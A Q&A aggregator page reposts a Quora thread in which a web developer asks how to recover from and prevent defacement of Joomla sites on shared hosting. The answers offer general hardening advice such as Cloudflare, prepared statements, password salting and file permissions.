Find solution
Can I get OSQL if I install SQL Server Client Tools?

My websites are hacked and would like some advice?

  • In the past couple of weeks, I am astounded and struggling to get back my client's websites online. I host with ResellerClub and all my websites are on their shared hosting packages. My biggest concern at this point is to make sure my other websites do not get hacked Below is a timeline of hacking events that took place One of multi-domain hosting packages gets attacked. The Hacker was some Moroccon / Egyptian. Thankfully only my primary domain was hacked which was not even being used - so the index file which was an under construction page was replaced by the defaced index file. To take care of the problem, I downloaded, scanned (using AVG Antivirus) and deleted the infected index files (which were referenced to a maroc.php). At this point, the website does not have any index file but it does not matter to me I immediately deleted all FTP accounts created for that multi-domain hosting package and just retained the primary one after modifying the password My next hacking incident happened about 1 week from then, when ResellerClub (my host) mailed me warning that one of my other domains (on another shared hosting package) was also attacked and that I need to remove the malware. I followed the same steps and restored the website CloudFlare Integration: Later, I did some research and found out about CloudFlare so I enabled that for most of my websites Next hacking incident occured today to a website which I had enabled on CloudFlare. No idea if this hack had occurred earlier and I am sure there is a way for me to find out from the logs which I will and post details below soon At this point, I have changed all FTP passwords, scanned the PCs being used for FTPing files What I am concerned about: Whether CloudFlare alone will do? It's a fairly new service and not sure how secure it is going to make my websites. The two individual domains that later got hacked were on the same shared server which I confirmed with my host was not under attack overall - but only my two domains. I code all my websites in Joomla and would like to know what actions I can take to make sure an SQL injection or backdoor trojan does not get through in the future 2 of my websites which got hacked were on Joomla and I am still not sure if there was an SQL injection. How can I figure that out? Are there any free tools which I could use to know the vulnerability of my website? Any best practices which will not get my website defaced / hacked in the future - other than configuration file permissions to be set to 660 What is php_globals and is it relevant to Joomla? What do I do with it to make my website more secure? I hear that if I disable it, it's supposed to be good for my server. This is my virgin experience with hackers and would like to know how to deal with it and what to worry about first!

  • Answer:

    1) Cloudflare is awesome , not just from a security point of view but also for performance . 2) The best safeguard against sql injection is to use prepared statements : http://docs.php.net/pdo.prepared-statements 3) If the SQL injection happened , the hacker would have either messed with your tables/database (dropped tables/db or flood it with junk values) or if it contains sensitive data they might have just copied it . If you stored passwords in the db , change how you hashed them and salt the passwords. Also , you might want to consider changing all the passwords and mailing the users new ones. This would cause discomfort but would save from unauthorized use by the hacker. 4) I believe there are a number of open source security checkers out there .Each one with different levels of complexity and magnitude . However , almost all are known to raise false alarms . 5) PHP globals are variables that are defined outside of any function, has a global scope.Global variables can be accessed from any part of the script, EXCEPT from within a function. They tend to pose a security risk . Ideally you should turn them off , http://faq.1and1.com/scripting_languages_supported/php/9.html 6) Keep all files off limits with 660 except the ones where your server needs to write during runtime (these might be external libraries,image folders etc.) Also , mention what kind of websites are these ? Static content based catalogue websites or dynamic websites with a little to a lot of functionality ? I might be able to suggest more measures.

Varun Jain at Quora Visit the source

Was this solution helpful to you?

Other answers

First thing i'ld do: change hosts. Chances are the host hasn't been patching their software properly, personally I'ld use a vps so I could manage it fully myself. To protect against Sql injection you just need to sanitize your inputs on the server. Just modify the input strings so all the key chars are escaped properly.

Mark Robinson

Related Q & A:

Just Added Q & A:

Find solution

For every problem there is a solution! Proved by Solucija.

  • Got an issue and looking for advice?

  • Ask Solucija to search every corner of the Web for help.

  • Get workable solutions and helpful tips in a moment.

Just ask Solucija about an issue you face and immediately get a list of ready solutions, answers and tips from other Internet users. We always provide the most suitable and complete answer to your question at the top, along with a few good alternatives below.